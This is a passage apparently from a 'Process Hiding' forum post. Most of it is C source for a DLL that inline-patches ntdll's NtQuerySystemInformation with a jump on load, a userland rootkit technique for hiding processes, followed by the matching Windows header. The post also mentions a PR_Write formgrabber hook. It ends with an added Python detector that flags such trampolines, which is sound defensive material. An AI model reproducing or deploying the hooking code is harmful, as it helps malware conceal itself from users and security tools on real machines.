        LPVOID sourceFunction;
        LPVOID destFunction;
        LPVOID stubFunction;

        destFunction = HookedNtQuerySystemInformation;
        stubFunction = OriginalNtQuerySystemInformation;
        sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
        CopyMemory(OrigBytes, sourceFunction, sizeof(BYTE)*5);
        if(sourceFunction == NULL){
            return 1;
        }

        // PatchStub
        VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
        CopyMemory(stubFunction, OrigBytes, sizeof(BYTE)*5);
        *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
        VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);

        // PatchSource
        VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
        *(LPBYTE)sourceFunction = 0xE9;
        *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
        VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);
        return 0;
    }

    void UnHook()
    {
        DWORD oldProtect;
        LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
        VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
        CopyMemory(addr, OrigBytes, sizeof(BYTE)*5);
        VirtualProtect(addr, 5, oldProtect, &oldProtect);
    }

    BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
    {
        switch (dwReason)
        {
        case DLL_PROCESS_ATTACH:
            PlaceHook();
            break;
        case DLL_PROCESS_DETACH:
            UnHook();
            break;
        }
        return TRUE;
    }

and the header:

    #ifndef __SYSINFO_H__
    #define __SYSINFO_H__

    #ifndef NTSTATUS
    #define NTSTATUS LONG
    #endif

    #define NT_SUCCESS(x) ((x) >= 0)
    #define STATUS_SUCCESS 0x00000000

    typedef enum _SYSTEM_INFORMATION_CLASS
    {
        SystemBasicInformation,
        SystemProcessorInformation,
        SystemPerformanceInformation,
        SystemTimeOfDayInformation,
        SystemPathInformation,
        SystemProcessInformation,
        SystemCallCountInformation,
        SystemDeviceInformation,
        SystemProcessorPerformanceInformation,
        SystemFlagsInformation,
        SystemCallTimeInformation,
        SystemModuleInformation,
        SystemLocksInformation,
        SystemStackTraceInformation,
        SystemPagedPoolInformation,
        SystemNonPagedPoolInformation,
        SystemHandleInformation,
        SystemObjectInformation,
        SystemPageFileInformation,
        SystemVdmInstemulInformation,
        SystemVdmBopInformation,
        SystemFileCacheInformation,
        SystemPoolTagInformation,
        SystemInterruptInformation,
        SystemDpcBehaviorInformation,
        SystemFullMemoryInformation,
        SystemLoadGdiDriverInformation,
        SystemUnloadGdiDriverInformation,
        SystemTimeAdjustmentInformation,
        SystemSummaryMemoryInformation,
        SystemNextEventIdInformation,
        SystemEventIdsInformation,
        SystemCrashDumpInformation,
        SystemExceptionInformation,
        SystemCrashDumpStateInformation,
        SystemKernelDebuggerInformation,
        SystemContextSwitchInformation,
        SystemRegistryQuotaInformation,
        SystemExtendServiceTableInformation,
        SystemPrioritySeperation,
        SystemPlugPlayBusInformation,
        SystemDockInformation,
        SystemPowerInformation1,
        SystemProcessorSpeedInformation,
        SystemCurrentTimeZoneInformation,
        SystemLookasideInformation
    } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

    typedef struct _LSA_UNICODE_STRING
    {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
    } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

    typedef CONST PUNICODE_STRING PCUNICODE_STRING;
    typedef LONG KPRIORITY;

    typedef struct _VM_COUNTERS
    {
        SIZE_T PeakVirtualSize;
        SIZE_T VirtualSize;
        ULONG PageFaultCount;
        SIZE_T PeakWorkingSetSize;
        SIZE_T WorkingSetSize;
        SIZE_T QuotaPeakPagedPoolUsage;
        SIZE_T QuotaPagedPoolUsage;
        SIZE_T QuotaPeakNonPagedPoolUsage;
        SIZE_T QuotaNonPagedPoolUsage;
        SIZE_T PagefileUsage;
        SIZE_T PeakPagefileUsage;
    } VM_COUNTERS;

    typedef struct _CLIENT_ID
    {
        DWORD UniqueProcess;
        DWORD UniqueThread;
    } CLIENT_ID;

    typedef struct _SYSTEM_THREADS
    {
        LARGE_INTEGER KernelTime;
        LARGE_INTEGER UserTime;
        LARGE_INTEGER CreateTime;
        ULONG WaitTime;
        PVOID StartAddress;
        CLIENT_ID ClientId;
        KPRIORITY Priority;
        KPRIORITY BasePriority;
        ULONG ContextSwitchCount;
        LONG State;
        LONG WaitReason;
    } SYSTEM_THREADS, *PSYSTEM_THREADS;

    typedef struct _SYSTEM_PROCESSES
    {
        ULONG NextEntryDelta;
        ULONG ThreadCount;
        ULONG Reserved1[6];
        LARGE_INTEGER CreateTime;
        LARGE_INTEGER UserTime;
        LARGE_INTEGER KernelTime;
        UNICODE_STRING ProcessName;
        KPRIORITY BasePriority;
        ULONG ProcessId;
        ULONG InheritedFromProcessId;
        ULONG HandleCount;
        ULONG Reserved2[2];
        VM_COUNTERS VmCounters;
        IO_COUNTERS IoCounters;
        SYSTEM_THREADS Threads[1];
    } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;

    typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL);

    #endif

Source: [c] Process Hiding
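Both the PR_Write formgrabber and the NtQuerySystemInformation hook above install themselves the same way: the first bytes of an exported function are overwritten with "E9 rel32", a jump into an injected DLL. The following Python is an added example, not code from either post, showing how an anti-rootkit scan spots that pattern: decode a leading trampoline, resolve its target, flag it when the target leaves the exporting module, and report any byte difference against the prologue from the file on disk. The module range, function address, clean prologue bytes and DLL address are all assumed sample values.

```python
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

# Both hook installers on this page overwrite the first bytes of an exported
# function with "E9 <rel32>" (jmp rel32) pointing into an injected DLL. This
# detector looks at a function prologue the way an anti-rootkit scanner would:
# decode a leading trampoline, resolve its target, and flag a target that lies
# outside the module exporting the function. When the prologue read from the
# file on disk is supplied, any byte difference is reported as well, which also
# catches patches that are not jumps.


@dataclass
class PrologueReport:
    kind: str                 # "clean", "jmp_rel32", "jmp_abs_ind", "push_ret" or "patched"
    target: Optional[int]     # resolved trampoline target (pointer slot address for FF 25)
    leaves_module: bool       # target outside [mod_base, mod_base + mod_size)
    differs_from_disk: bool   # in-memory bytes differ from the on-disk prologue


def _decode_trampoline(code: bytes, addr: int) -> Tuple[str, Optional[int]]:
    """Decode the common 32-bit trampoline encodings at the start of `code`."""
    if len(code) >= 5 and code[0] == 0xE9:                          # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp_rel32", (addr + 5 + rel) & 0xFFFFFFFF
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:       # push imm32 ; ret
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:       # jmp dword ptr [abs32]
        return "jmp_abs_ind", struct.unpack_from("<I", code, 2)[0]   # address of the pointer slot
    return "clean", None


def analyze_prologue(mem: bytes, addr: int, mod_base: int, mod_size: int,
                     disk: Optional[bytes] = None) -> PrologueReport:
    """Inspect the bytes `mem` found at `addr`, an export of the module loaded at `mod_base`."""
    kind, target = _decode_trampoline(mem, addr)
    leaves = target is not None and not (mod_base <= target < mod_base + mod_size)
    n = min(len(mem), len(disk)) if disk is not None else 0
    differs = disk is not None and mem[:n] != disk[:n]
    if kind == "clean" and differs:
        kind = "patched"
    return PrologueReport(kind, target, leaves, differs)


def is_hooked(report: PrologueReport) -> bool:
    """Hooked when the trampoline leaves the module or the bytes no longer match disk."""
    return report.leaves_module or report.differs_from_disk


# --- constructed sample data (assumed addresses, not real ntdll bytes) ---
NTDLL_BASE, NTDLL_SIZE = 0x77000000, 0x00100000
FUNC_ADDR = NTDLL_BASE + 0x12340                      # stand-in for NtQuerySystemInformation
CLEAN_PROLOGUE = bytes.fromhex("8bff558bec")          # mov edi,edi ; push ebp ; mov ebp,esp
HOOK_DLL_FUNC = 0x10001000                            # assumed address inside an injected DLL


def build_rel32_jmp(src: int, dst: int, tail: bytes = b"") -> bytes:
    """Encode 'E9 rel32' from src to dst (rel32 = dst - (src + 5)), optionally followed by `tail`."""
    return b"\xE9" + struct.pack("<i", dst - (src + 5)) + tail


def demo() -> dict:
    """Run the detector over a hooked, a clean and an intra-module prologue."""
    hooked = build_rel32_jmp(FUNC_ADDR, HOOK_DLL_FUNC, tail=b"\xC3")   # formgrabber layout: jmp ; ret
    r_hooked = analyze_prologue(hooked, FUNC_ADDR, NTDLL_BASE, NTDLL_SIZE, CLEAN_PROLOGUE)
    r_clean = analyze_prologue(CLEAN_PROLOGUE, FUNC_ADDR, NTDLL_BASE, NTDLL_SIZE, CLEAN_PROLOGUE)
    # A jump that stays inside the module (a compiler thunk, for instance) is not a hook.
    internal = build_rel32_jmp(FUNC_ADDR, NTDLL_BASE + 0x50000)
    r_internal = analyze_prologue(internal, FUNC_ADDR, NTDLL_BASE, NTDLL_SIZE)
    return {"hooked": r_hooked, "clean": r_clean, "internal": r_internal}


if __name__ == "__main__":
    for name, rep in demo().items():
        print(f"{name:8s} kind={rep.kind:11s} target={rep.target} hooked={is_hooked(rep)}")
```

On a live system the `mem` bytes come from reading the export's address in the target process and `disk` from the same RVA in the module file, which is the comparison the page's UnHook() relies on in reverse.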